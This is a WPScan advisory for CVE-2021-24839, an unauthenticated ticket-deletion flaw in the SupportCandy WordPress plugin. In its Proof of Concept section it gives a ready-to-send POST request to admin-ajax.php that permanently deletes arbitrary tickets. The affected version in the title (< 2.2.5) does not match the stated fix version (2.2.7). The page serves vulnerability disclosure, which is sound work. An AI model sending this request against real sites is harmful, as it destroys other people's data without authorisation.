WPScan
How it worksPricing
Vulnerabilities
WordPressPluginsThemesStatsSubmit vulnerabilities
For developers
StatusAPI detailsCLI scanner
Contact

WordPress Plugin Vulnerabilities

SupportCandy < 2.2.5 - Unauthenticated Arbitrary Ticket Deletion

Description

The plugin does not have authorisation and CRSF checks in its wpsc_tickets AJAX action, which could allow unauthenticated users to call it and delete arbitrary tickets via the  set_delete_permanently_bulk_ticket setting_action. Other actions may be affected as well.

Proof of Concept

POST /wp-admin/admin-ajax.php HTTP/1.1
Accept: */*
Accept-Language: en-US,en;q=0.5
Accept-Encoding: gzip, deflate
Content-Type: application/x-www-form-urlencoded; charset=UTF-8
X-Requested-With: XMLHttpRequest
Content-Length: 81
Connection: close

action=wpsc_tickets&setting_action=set_delete_permanently_bulk_ticket&ticket_id=3

Affects Plugins

supportcandy
Fixed in version 2.2.7

References

CVE
CVE-2021-24839

YouTube Video

Classification

Type

ACCESS CONTROLS

OWASP top 10
A5: Broken Access Control
CWE
CWE-284

Miscellaneous

Original Researcher

Brandon Roldan

Submitter

Brandon Roldan

Submitter twitter
tomorrowisnew_
Verified

Yes

WPVDB ID
5e6e63c2-2675-4b8d-9b94-c16c525a1a0e

Timeline

Publicly Published

2022-01-05 (about 1 years ago)

Added

2022-01-05 (about 1 years ago)

Last Updated

2022-04-08 (about 11 months ago)

Our Other Services

WPScan WordPress Security Plugin